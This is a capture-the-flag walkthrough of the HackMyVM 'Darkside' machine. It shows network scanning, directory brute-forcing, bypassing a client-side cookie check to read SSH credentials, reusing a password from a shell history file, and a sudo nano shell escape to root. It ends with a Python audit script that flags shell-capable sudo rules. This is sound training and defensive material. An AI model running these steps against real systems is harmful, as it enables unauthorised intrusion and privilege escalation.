HackMyVM-Darkside
Information Gathering

Host Discovery

    ┌──(kali㉿kali)-[~]
    └─$ nmap -sn 192.168.2.0/24
    Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 03:46 EDT
    Nmap scan report for darkside (192.168.2.19)
    Host is up (0.00023s latency).
    MAC Address: 08:00:27:3B:49:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
    Nmap scan report for kali (192.168.2.12)
    Host is up.
    Nmap done: 256 IP addresses (9 hosts up) scanned in 2.75 seconds

Port Scanning

    ┌──(kali㉿kali)-[~]
    └─$ nmap -A -p- 192.168.2.19
    Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 03:47 EDT
    Nmap scan report for darkside (192.168.2.19)
    Host is up (0.00050s latency).
    Not shown: 65533 closed tcp ports (reset)
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
    | ssh-hostkey:
    |   3072 e0:25:46:8e:b8:bb:ba:69:69:1b:a7:4d:28:34:04:dd (RSA)
    |   256 60:12:04:69:5e:c4:a1:42:2d:2b:51:8a:57:fe:a8:8a (ECDSA)
    |_  256 84:bb:60:b7:79:5d:09:9c:dd:24:23:a3:f2:65:89:3f (ED25519)
    80/tcp open  http    Apache httpd 2.4.56 ((Debian))
    | http-cookie-flags:
    |   /:
    |     PHPSESSID:
    |_      httponly flag not set
    |_http-server-header: Apache/2.4.56 (Debian)
    |_http-title: The DarkSide
    MAC Address: 08:00:27:3B:49:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
    Device type: general purpose|router
    Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
    OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
    OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.50 ms darkside (192.168.2.19)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.12 seconds

Exploitation

Let's see what is on port 80:

    ┌──(kali㉿kali)-[~]
    └─$ curl http://192.168.2.19
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link rel="stylesheet" href="styles.css">
      <title>The DarkSide</title>
    </head>
    <body>
      <div class="welcome-message">
        <h1>Welcome to the DarkSide</h1>
      </div>
      <div class="main">
        <form action="" method="POST">
          <h1>LOGIN</h1>
          <label>USERNAME</label>
          <input type="text" name="user">
          <label>PASSWORD</label>
          <input type="password" name="pass">
          <button type="submit">LOGIN</button>
        </form>
      </div>
    </body>
    </html>

It is a login page. Try a directory scan:

    ┌──(kali㉿kali)-[~]
    └─$ gobuster dir -u http://192.168.2.19 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
    Gobuster v3.6
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    [+] Url:                     http://192.168.2.19
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.6
    [+] Extensions:              txt,jpg,png,zip,git,html,php
    [+] Timeout:                 10s
    Starting gobuster in directory enumeration mode
    /.html                (Status: 403) [Size: 277]
    /.php                 (Status: 403) [Size: 277]
    /index.php            (Status: 200) [Size: 683]
    /backup               (Status: 301) [Size: 313] [--> http://192.168.2.19/backup/]
    /.php                 (Status: 403) [Size: 277]
    /.html                (Status: 403) [Size: 277]
    /server-status        (Status: 403) [Size: 277]
    /logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277]
    Progress: 9482032 / 9482040 (100.00%)
    Finished

There is a /backup/ directory, and it contains a vote.txt file:

    rijaba: Yes
    xerosec: Yes
    sml: No
    cromiphi: No
    gatogamer: No
    chema: Yes
    talleyrand: No
    d3b0o: Yes

    Since the result was a draw, we will let you enter the darkside, or at least temporarily, good luck kevin.

We now have usernames. After brute-forcing the login we get a string, which decodes to sfqekmgncutjhbypvxda.onion. Take a look:

    ┌──(kali㉿kali)-[~]
    └─$ curl http://192.168.2.19/sfqekmgncutjhbypvxda.onion/
    <!DOCTYPE html>
    <html>
    <head>
      <title>Which Side Are You On?</title>
      <style>
        body {
          background-color: black;
          color: white;
          font-size: 24px;
          margin: 0;
        }
      </style>
    </head>
    <body>
      <div>
        <p>Which Side Are You On?</p>
      </div>
      <script>
        var sideCookie = document.cookie.match(/(^| )side=([^;]+)/);
        if (sideCookie && sideCookie[2] === 'darkside') {
          window.location.href = 'hwvhysntovtanj.password';
        }
      </script>
    </body>
    </html>

The script reads the side cookie and, if its value is darkside, redirects to hwvhysntovtanj.password. The check runs only in the browser and the target path is in the page source, so we can request hwvhysntovtanj.password directly:

    ┌──(kali㉿kali)-[~]
    └─$ curl http://192.168.2.19/sfqekmgncutjhbypvxda.onion/hwvhysntovtanj.password
    kevin:ILoveCalisthenics

Log in over SSH:

    ┌──(kali㉿kali)-[~]
    └─$ ssh kevin@192.168.2.19
    The authenticity of host '192.168.2.19 (192.168.2.19)' can't be established.
    ED25519 key fingerprint is SHA256:pmPw9d2/o54jNDmo29Hq6rIzWOQ//VhyZvK4KN6rmk.
    This key is not known by any other names.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.2.19' (ED25519) to the list of known hosts.
    kevin@192.168.2.19's password:
    Linux darkside 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Sun Oct 15 15:18:15 2023 from 10.0.2.18
    kevin@darkside:~$

Privilege Escalation

There is a password in .history; try it:

    kevin@darkside:~$ cat .history
    ls -al
    hostname -I
    echo "Congratulations on the OSCP Xerosec"
    top
    ps -faux
    su rijaba
    ILoveJabita
    ls /home/rijaba
    kevin@darkside:~$ su rijaba
    Password:
    rijaba@darkside:/home/kevin$ id
    uid=1001(rijaba) gid=1001(rijaba) groups=1001(rijaba)

rijaba may run nano as root without a password. Enter nano, press CTRL+R then CTRL+X, and type reset; sh 1>&0 2>&0 to get a root shell:

    rijaba@darkside:~$ sudo -l
    Matching Defaults entries for rijaba on darkside:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User rijaba may run the following commands on darkside:
        (root) NOPASSWD: /usr/bin/nano

    # id
    uid=0(root) gid=0(root) groups=0(root)
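
The root cause of the final step is a sudoers rule that grants an interactive editor as root. The following is an added example, not part of the original write-up: a small audit that parses `sudo -l` output and flags rules handing out programs that can spawn a shell. The function name `audit_sudo_listing`, the `SHELL_CAPABLE` list and the second sample rule are assumptions made for illustration.

```python
import re
from pathlib import PurePosixPath

# Assumption: short, non-exhaustive list of programs that can start a shell or
# run commands from their own interface (editors, pagers, interpreters).
SHELL_CAPABLE = {"nano", "vi", "vim", "less", "more", "man", "find", "awk",
                 "python3", "perl", "bash", "sh"}
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG = re.compile(r"([A-Z_]+):\s*")

def audit_sudo_listing(text):
    """Flag `sudo -l` entries that hand out a shell-capable program."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = ENTRY.match(line) if in_rules else None
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()
        nopasswd = False
        for spec in m["rest"].split(","):
            spec = spec.strip()
            # Tags (NOPASSWD:, PASSWD:, ...) prefix a command and persist
            # for the following commands on the same line.
            while (tag := TAG.match(spec)):
                if tag[1] in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag[1] == "NOPASSWD"
                spec = spec[tag.end():]
            if not spec:
                continue
            cmd = spec.split()[0]
            if cmd == "ALL" or PurePosixPath(cmd).name in SHELL_CAPABLE:
                critical = nopasswd and runas in ("root", "ALL")
                findings.append({"runas": runas, "command": cmd, "nopasswd": nopasswd,
                                 "severity": "critical" if critical else "high"})
    return findings

# First rule is the one shown in the write-up; the second is constructed.
SAMPLE = r"""Matching Defaults entries for rijaba on darkside:
    env_reset, mail_badpass

User rijaba may run the following commands on darkside:
    (root) NOPASSWD: /usr/bin/nano
    (root) /usr/sbin/reboot, /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE):
        print(finding)
```

Where a user only needs to edit a specific root-owned file, granting `sudoedit` on that file runs the editor as the invoking user rather than as root, which removes the shell-escape path.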